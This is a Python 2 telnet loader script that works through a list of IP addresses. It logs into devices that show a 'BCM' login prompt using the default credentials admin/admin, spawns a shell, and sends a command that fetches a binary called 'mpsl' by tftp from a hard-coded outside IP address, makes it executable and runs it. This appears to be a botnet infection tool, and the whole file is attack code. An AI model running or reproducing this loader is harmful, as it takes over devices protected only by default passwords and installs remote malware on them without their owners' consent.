1
import threading, sys, time, random, socket, re, os
2

3
if len(sys.argv) < 2:
4
        print "Usage: python "+sys.argv[0]+" <list>"
5
        sys.exit()
6

7
ips = open(sys.argv[1], "r").readlines()
8
username = "admin"
9
password = "admin"
10
cmd = "cd /var || cd /tmp || cd /var/run || cd /var/tmp; tftp -g 185.128.43.214 -r mpsl; chmod 777 mpsl; ./mpsl"
11
spawn_shell = "cat | sh"
12
count = 0
13
def readUntil(tn, string, timeout=15):
14
    buf = ''
15
    start_time = time.time()
16
    while time.time() - start_time < timeout:
17
        buf += tn.recv(1024)
18
        time.sleep(0.01)
19
        if string in buf: return buf
20
    raise Exception('TIMEOUT!')
21

22
class BCMM(threading.Thread):
23
        def __init__ (self, ip):
24
			threading.Thread.__init__(self)
25
			self.ip = str(ip).rstrip('\n')
26
        def run(self):
27
		try:
28
			tn = socket.socket()
29
			tn.settimeout(5)
30
			tn.connect((self.ip,23))
31
		except Exception:
32
			print "[%s] Timeout"%(count)
33
		try:
34
			time.sleep(0.01)
35
			hoho = ''
36
			hoho += readUntil(tn, ":")
37
			if "ogin" in hoho and "BCM" in hoho:
38
				tn.send(username + "\n")
39
		except Exception:
40
			tn.close()
41
		try:
42
			hoho = ''
43
			hoho += readUntil(tn, ":")
44
			if "assword" in hoho:
45
				tn.send(password + "\n")
46
				time.sleep(3)
47
		except Exception:
48
			tn.close()
49
		try:
50
			mp = ''
51
			mp += tn.recv(1024)
52
			if "#" in mp or "$" in mp or ">" in mp:
53
				tn.send(spawn_shell + "\n")
54
				time.sleep(1)
55
				tn.send(cmd + "\n")
56
				print "\033[32m[%s] command sent %s!\033[37m"%(count, self.ip)
57
				time.sleep(10)
58
				tn.close()				
59
		except Exception:
60
			tn.close()
61
			print "[%s] Timeout"%(count)
62
for ip in ips:
63
	try:
64
		count += 1
65
		t = BCMM(ip)
66
		t.start()
67
		time.sleep(0.02)
68
	except:
69
		pass
70